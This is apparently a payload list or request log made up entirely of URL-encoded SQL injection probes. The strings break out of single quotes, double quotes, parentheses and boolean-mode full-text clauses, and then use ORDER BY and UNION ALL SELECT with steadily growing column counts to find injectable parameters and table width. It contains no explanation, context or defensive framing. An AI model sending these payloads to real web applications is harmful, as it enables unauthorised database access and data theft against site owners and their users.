-2084%27%29%20WHERE%207992%3D7992%20UNION%20ALL%20SELECT%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992--%20 -5608%27%29%20WHERE%203722%3D3722%20UNION%20ALL%20SELECT%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722--%20 -4877%27%29%20WHERE%203565%3D3565%20UNION%20ALL%20SELECT%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565--%20 -2288%27%20WHERE%206581%3D6581%20ORDER%20BY%201--%20 -2953%27%20WHERE%204262%3D4262%20ORDER%20BY%204256--%20 -2564%27%20WHERE%204779%3D4779%20UNION%20ALL%20SELECT%204779--%20 -2374%27%20WHERE%208608%3D8608%20UNION%20ALL%20SELECT%208608%2C%208608--%20 -4411%27%20WHERE%202507%3D2507%20UNION%20ALL%20SELECT%202507%2C%202507%2C%202507--%20 -8202%27%20WHERE%206487%3D6487%20UNION%20ALL%20SELECT%206487%2C%206487%2C%206487%2C%206487--%20 -7948%27%20WHERE%206265%3D6265%20UNION%20ALL%20SELECT%206265%2C%206265%2C%206265%2C%206265%2C%206265--%20 -6873%27%20WHERE%208435%3D8435%20UNION%20ALL%20SELECT%208435%2C%208435%2C%208435%2C%208435%2C%208435%2C%208435--%20 -7159%27%20WHERE%201100%3D1100%20UNION%20ALL%20SELECT%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100%2C%201100--%20 -9436%27%20WHERE%201972%3D1972%20UNION%20ALL%20SELECT%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972%2C%201972--%20 -9685%27%20WHERE%203919%3D3919%20UNION%20ALL%20SELECT%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919--%20 -7634%27%20WHERE%205892%3D5892%20UNION%20ALL%20SELECT%205892%2C%205892%2C%205892%2C%205892%2C%205892%2C%205892%2C%205892%2C%205892%2C%205892%2C%205892--%20 -8414%22%20WHERE%203384%3D3384%20ORDER%20BY%201--%20 -2634%22%20WHERE%201475%3D1475%20ORDER%20BY%207059--%20 -8263%22%20WHERE%203347%3D3347%20UNION%20ALL%20SELECT%203347--%20 -6733%22%20WHERE%201101%3D1101%20UNION%20ALL%20SELECT%201101%2C%201101--%20 -8408%22%20WHERE%208892%3D8892%20UNION%20ALL%20SELECT%208892%2C%208892%2C%208892--%20 -4330%22%20WHERE%204317%3D4317%20UNION%20ALL%20SELECT%204317%2C%204317%2C%204317%2C%204317--%20 -9856%22%20WHERE%201880%3D1880%20UNION%20ALL%20SELECT%201880%2C%201880%2C%201880%2C%201880%2C%201880--%20 -4063%22%20WHERE%209487%3D9487%20UNION%20ALL%20SELECT%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487--%20 -8995%22%20WHERE%203844%3D3844%20UNION%20ALL%20SELECT%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844--%20 -1793%22%20WHERE%205054%3D5054%20UNION%20ALL%20SELECT%205054%2C%205054%2C%205054%2C%205054%2C%205054%2C%205054%2C%205054%2C%205054--%20 -2927%22%20WHERE%203839%3D3839%20UNION%20ALL%20SELECT%203839%2C%203839%2C%203839%2C%203839%2C%203839%2C%203839%2C%203839%2C%203839%2C%203839--%20 -8029%22%20WHERE%206938%3D6938%20UNION%20ALL%20SELECT%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938--%20 -4111%27%20%7C%7C%20%28SELECT%203753%20FROM%20DUAL%20WHERE%206720%3D6720%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 -3797%27%20%7C%7C%20%28SELECT%206452%20FROM%20DUAL%20WHERE%205244%3D5244%20ORDER%20BY%206229--%20%20%29%20%7C%7C%20%27 -7741%27%20%7C%7C%20%28SELECT%202877%20FROM%20DUAL%20WHERE%201255%3D1255%20UNION%20ALL%20SELECT%201255--%20%20%29%20%7C%7C%20%27 -3747%27%20%7C%7C%20%28SELECT%204594%20FROM%20DUAL%20WHERE%206552%3D6552%20UNION%20ALL%20SELECT%206552%2C%206552--%20%20%29%20%7C%7C%20%27 -8335%27%20%7C%7C%20%28SELECT%208627%20FROM%20DUAL%20WHERE%208321%3D8321%20UNION%20ALL%20SELECT%208321%2C%208321%2C%208321--%20%20%29%20%7C%7C%20%27 -8334%27%20%7C%7C%20%28SELECT%202996%20FROM%20DUAL%20WHERE%207078%3D7078%20UNION%20ALL%20SELECT%207078%2C%207078%2C%207078%2C%207078--%20%20%29%20%7C%7C%20%27 -3707%27%20%7C%7C%20%28SELECT%208807%20FROM%20DUAL%20WHERE%208668%3D8668%20UNION%20ALL%20SELECT%208668%2C%208668%2C%208668%2C%208668%2C%208668--%20%20%29%20%7C%7C%20%27 -8743%27%20%7C%7C%20%28SELECT%208306%20FROM%20DUAL%20WHERE%204776%3D4776%20UNION%20ALL%20SELECT%204776%2C%204776%2C%204776%2C%204776%2C%204776%2C%204776--%20%20%29%20%7C%7C%20%27 -3678%27%20%7C%7C%20%28SELECT%201786%20FROM%20DUAL%20WHERE%204636%3D4636%20UNION%20ALL%20SELECT%204636%2C%204636%2C%204636%2C%204636%2C%204636%2C%204636%2C%204636--%20%20%29%20%7C%7C%20%27 -2355%27%20%7C%7C%20%28SELECT%207465%20FROM%20DUAL%20WHERE%204132%3D4132%20UNION%20ALL%20SELECT%204132%2C%204132%2C%204132%2C%204132%2C%204132%2C%204132%2C%204132%2C%204132--%20%20%29%20%7C%7C%20%27 -1350%27%20%7C%7C%20%28SELECT%203223%20FROM%20DUAL%20WHERE%208961%3D8961%20UNION%20ALL%20SELECT%208961%2C%208961%2C%208961%2C%208961%2C%208961%2C%208961%2C%208961%2C%208961%2C%208961--%20%20%29%20%7C%7C%20%27 -7410%27%20%7C%7C%20%28SELECT%204862%20FROM%20DUAL%20WHERE%209979%3D9979%20UNION%20ALL%20SELECT%209979%2C%209979%2C%209979%2C%209979%2C%209979%2C%209979%2C%209979%2C%209979%2C%209979%2C%209979--%20%20%29%20%7C%7C%20%27 -4931%27%20%7C%7C%20%28SELECT%205868%20WHERE%201113%3D1113%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 -4252%27%20%7C%7C%20%28SELECT%209600%20WHERE%202923%3D2923%20ORDER%20BY%205914--%20%20%29%20%7C%7C%20%27 -8281%27%20%7C%7C%20%28SELECT%209884%20WHERE%201780%3D1780%20UNION%20ALL%20SELECT%201780--%20%20%29%20%7C%7C%20%27 -2890%27%20%7C%7C%20%28SELECT%203793%20WHERE%209049%3D9049%20UNION%20ALL%20SELECT%209049%2C%209049--%20%20%29%20%7C%7C%20%27 -1693%27%20%7C%7C%20%28SELECT%208785%20WHERE%202187%3D2187%20UNION%20ALL%20SELECT%202187%2C%202187%2C%202187--%20%20%29%20%7C%7C%20%27 -5386%27%20%7C%7C%20%28SELECT%201891%20WHERE%203708%3D3708%20UNION%20ALL%20SELECT%203708%2C%203708%2C%203708%2C%203708--%20%20%29%20%7C%7C%20%27 -1307%27%20%7C%7C%20%28SELECT%203112%20WHERE%201294%3D1294%20UNION%20ALL%20SELECT%201294%2C%201294%2C%201294%2C%201294%2C%201294--%20%20%29%20%7C%7C%20%27 -1946%27%20%7C%7C%20%28SELECT%204002%20WHERE%201688%3D1688%20UNION%20ALL%20SELECT%201688%2C%201688%2C%201688%2C%201688%2C%201688%2C%201688--%20%20%29%20%7C%7C%20%27 -8831%27%20%7C%7C%20%28SELECT%207035%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244--%20%20%29%20%7C%7C%20%27 -2939%27%20%7C%7C%20%28SELECT%202694%20WHERE%206747%3D6747%20UNION%20ALL%20SELECT%206747%2C%206747%2C%206747%2C%206747%2C%206747%2C%206747%2C%206747%2C%206747--%20%20%29%20%7C%7C%20%27 -9808%27%20%7C%7C%20%28SELECT%201330%20WHERE%203205%3D3205%20UNION%20ALL%20SELECT%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205%2C%203205--%20%20%29%20%7C%7C%20%27 -9460%27%20%7C%7C%20%28SELECT%206052%20WHERE%208245%3D8245%20UNION%20ALL%20SELECT%208245%2C%208245%2C%208245%2C%208245%2C%208245%2C%208245%2C%208245%2C%208245%2C%208245%2C%208245--%20%20%29%20%7C%7C%20%27 -8464%20%2B%20%28SELECT%204022%20FROM%20DUAL%20WHERE%203584%3D3584%20ORDER%20BY%201--%20%20%29 -8455%20%2B%20%28SELECT%204459%20FROM%20DUAL%20WHERE%208444%3D8444%20ORDER%20BY%206081--%20%20%29 -5145%20%2B%20%28SELECT%209774%20FROM%20DUAL%20WHERE%204524%3D4524%20UNION%20ALL%20SELECT%204524--%20%20%29 -1078%20%2B%20%28SELECT%204744%20FROM%20DUAL%20WHERE%207611%3D7611%20UNION%20ALL%20SELECT%207611%2C%207611--%20%20%29 -1059%20%2B%20%28SELECT%206252%20FROM%20DUAL%20WHERE%209021%3D9021%20UNION%20ALL%20SELECT%209021%2C%209021%2C%209021--%20%20%29 -2163%20%2B%20%28SELECT%209213%20FROM%20DUAL%20WHERE%207892%3D7892%20UNION%20ALL%20SELECT%207892%2C%207892%2C%207892%2C%207892--%20%20%29 -5313%20%2B%20%28SELECT%204874%20FROM%20DUAL%20WHERE%209782%3D9782%20UNION%20ALL%20SELECT%209782%2C%209782%2C%209782%2C%209782%2C%209782--%20%20%29 -8730%20%2B%20%28SELECT%204615%20FROM%20DUAL%20WHERE%205636%3D5636%20UNION%20ALL%20SELECT%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636--%20%20%29 -4601%20%2B%20%28SELECT%201385%20FROM%20DUAL%20WHERE%204653%3D4653%20UNION%20ALL%20SELECT%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653%2C%204653--%20%20%29 -3869%20%2B%20%28SELECT%207555%20FROM%20DUAL%20WHERE%206023%3D6023%20UNION%20ALL%20SELECT%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023%2C%206023--%20%20%29 -1021%20%2B%20%28SELECT%201138%20FROM%20DUAL%20WHERE%208199%3D8199%20UNION%20ALL%20SELECT%208199%2C%208199%2C%208199%2C%208199%2C%208199%2C%208199%2C%208199%2C%208199%2C%208199--%20%20%29 -5080%20%2B%20%28SELECT%202692%20FROM%20DUAL%20WHERE%203232%3D3232%20UNION%20ALL%20SELECT%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232%2C%203232--%20%20%29 -1207%20%2B%20%28SELECT%207789%20WHERE%208386%3D8386%20ORDER%20BY%201--%20%20%29 -6131%20%2B%20%28SELECT%207501%20WHERE%206326%3D6326%20ORDER%20BY%206101--%20%20%29 -7725%20%2B%20%28SELECT%206277%20WHERE%209818%3D9818%20UNION%20ALL%20SELECT%209818--%20%20%29 -2177%20%2B%20%28SELECT%201623%20WHERE%208276%3D8276%20UNION%20ALL%20SELECT%208276%2C%208276--%20%20%29 -8750%20%2B%20%28SELECT%201166%20WHERE%209464%3D9464%20UNION%20ALL%20SELECT%209464%2C%209464%2C%209464--%20%20%29 -2428%20%2B%20%28SELECT%206943%20WHERE%209705%3D9705%20UNION%20ALL%20SELECT%209705%2C%209705%2C%209705%2C%209705--%20%20%29 -9620%20%2B%20%28SELECT%203053%20WHERE%208874%3D8874%20UNION%20ALL%20SELECT%208874%2C%208874%2C%208874%2C%208874%2C%208874--%20%20%29 -2984%20%2B%20%28SELECT%203306%20WHERE%209415%3D9415%20UNION%20ALL%20SELECT%209415%2C%209415%2C%209415%2C%209415%2C%209415%2C%209415--%20%20%29 -2998%20%2B%20%28SELECT%205298%20WHERE%204851%3D4851%20UNION%20ALL%20SELECT%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851--%20%20%29 -5917%20%2B%20%28SELECT%201285%20WHERE%207268%3D7268%20UNION%20ALL%20SELECT%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268--%20%20%29 -1152%20%2B%20%28SELECT%208347%20WHERE%203945%3D3945%20UNION%20ALL%20SELECT%203945%2C%203945%2C%203945%2C%203945%2C%203945%2C%203945%2C%203945%2C%203945%2C%203945--%20%20%29 -8715%20%2B%20%28SELECT%202750%20WHERE%203338%3D3338%20UNION%20ALL%20SELECT%203338%2C%203338%2C%203338%2C%203338%2C%203338%2C%203338%2C%203338%2C%203338%2C%203338%2C%203338--%20%20%29 -5082%27%20%2B%20%28SELECT%20%27DPOS%27%20FROM%20DUAL%20WHERE%201402%3D1402%20ORDER%20BY%201--%20%20%29%20%2B%20%27 -5411%27%20%2B%20%28SELECT%20%27ekUL%27%20FROM%20DUAL%20WHERE%209675%3D9675%20ORDER%20BY%202122--%20%20%29%20%2B%20%27 -7090%27%20%2B%20%28SELECT%20%27ZAmH%27%20FROM%20DUAL%20WHERE%208951%3D8951%20UNION%20ALL%20SELECT%208951--%20%20%29%20%2B%20%27 -4037%27%20%2B%20%28SELECT%20%27ZFJv%27%20FROM%20DUAL%20WHERE%209902%3D9902%20UNION%20ALL%20SELECT%209902%2C%209902--%20%20%29%20%2B%20%27 -3761%27%20%2B%20%28SELECT%20%27OPjz%27%20FROM%20DUAL%20WHERE%206548%3D6548%20UNION%20ALL%20SELECT%206548%2C%206548%2C%206548--%20%20%29%20%2B%20%27 -9144%27%20%2B%20%28SELECT%20%27jSUe%27%20FROM%20DUAL%20WHERE%206505%3D6505%20UNION%20ALL%20SELECT%206505%2C%206505%2C%206505%2C%206505--%20%20%29%20%2B%20%27 -1990%27%20%2B%20%28SELECT%20%27Jpgw%27%20FROM%20DUAL%20WHERE%209509%3D9509%20UNION%20ALL%20SELECT%209509%2C%209509%2C%209509%2C%209509%2C%209509--%20%20%29%20%2B%20%27 -3384%27%20%2B%20%28SELECT%20%27vVhi%27%20FROM%20DUAL%20WHERE%204479%3D4479%20UNION%20ALL%20SELECT%204479%2C%204479%2C%204479%2C%204479%2C%204479%2C%204479--%20%20%29%20%2B%20%27 -1456%27%20%2B%20%28SELECT%20%27vNcX%27%20FROM%20DUAL%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669--%20%20%29%20%2B%20%27 -8014%27%20%2B%20%28SELECT%20%27TJLd%27%20FROM%20DUAL%20WHERE%202104%3D2104%20UNION%20ALL%20SELECT%202104%2C%202104%2C%202104%2C%202104%2C%202104%2C%202104%2C%202104%2C%202104--%20%20%29%20%2B%20%27 -1714%27%20%2B%20%28SELECT%20%27rBfP%27%20FROM%20DUAL%20WHERE%205340%3D5340%20UNION%20ALL%20SELECT%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340--%20%20%29%20%2B%20%27 -3679%27%20%2B%20%28SELECT%20%27UpMh%27%20FROM%20DUAL%20WHERE%201111%3D1111%20UNION%20ALL%20SELECT%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111%2C%201111--%20%20%29%20%2B%20%27 -4789%27%20%2B%20%28SELECT%20%27KhXy%27%20WHERE%204051%3D4051%20ORDER%20BY%201--%20%20%29%20%2B%20%27 -2209%27%20%2B%20%28SELECT%20%27sjWw%27%20WHERE%208029%3D8029%20ORDER%20BY%205432--%20%20%29%20%2B%20%27 -7876%27%20%2B%20%28SELECT%20%27cjoe%27%20WHERE%203672%3D3672%20UNION%20ALL%20SELECT%203672--%20%20%29%20%2B%20%27 -5824%27%20%2B%20%28SELECT%20%27WduP%27%20WHERE%208867%3D8867%20UNION%20ALL%20SELECT%208867%2C%208867--%20%20%29%20%2B%20%27 -6847%27%20%2B%20%28SELECT%20%27JkVE%27%20WHERE%202340%3D2340%20UNION%20ALL%20SELECT%202340%2C%202340%2C%202340--%20%20%29%20%2B%20%27 -3775%27%20%2B%20%28SELECT%20%27xNuu%27%20WHERE%206567%3D6567%20UNION%20ALL%20SELECT%206567%2C%206567%2C%206567%2C%206567--%20%20%29%20%2B%20%27 -2225%27%20%2B%20%28SELECT%20%27yaPq%27%20WHERE%204564%3D4564%20UNION%20ALL%20SELECT%204564%2C%204564%2C%204564%2C%204564%2C%204564--%20%20%29%20%2B%20%27 -5157%27%20%2B%20%28SELECT%20%27YDAq%27%20WHERE%209598%3D9598%20UNION%20ALL%20SELECT%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598--%20%20%29%20%2B%20%27 -2121%27%20%2B%20%28SELECT%20%27FwUi%27%20WHERE%202985%3D2985%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985--%20%20%29%20%2B%20%27 -3589%27%20%2B%20%28SELECT%20%27hdbv%27%20WHERE%208929%3D8929%20UNION%20ALL%20SELECT%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929%2C%208929--%20%20%29%20%2B%20%27 -1688%27%20%2B%20%28SELECT%20%27zCUX%27%20WHERE%202462%3D2462%20UNION%20ALL%20SELECT%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462--%20%20%29%20%2B%20%27 -7707%27%20%2B%20%28SELECT%20%27YaHY%27%20WHERE%203969%3D3969%20UNION%20ALL%20SELECT%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969%2C%203969--%20%20%29%20%2B%20%27 -5406%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20%20%23 -3559%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%202458--%20%20%23 -9796%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201404--%20%20%23 -6902%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203058%2C%203058--%20%20%23 -5602%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206735%2C%206735%2C%206735--%20%20%23 -1495%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206706%2C%206706%2C%206706%2C%206706--%20%20%23 -1149%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205400%2C%205400%2C%205400%2C%205400%2C%205400--%20%20%23 -3433%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206323%2C%206323%2C%206323%2C%206323%2C%206323%2C%206323--%20%20%23 -8476%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204298%2C%204298%2C%204298%2C%204298%2C%204298%2C%204298%2C%204298--%20%20%23 -6131%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208258%2C%208258%2C%208258%2C%208258%2C%208258%2C%208258%2C%208258%2C%208258--%20%20%23 -6364%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679--%20%20%23 -1799%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991--%20%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 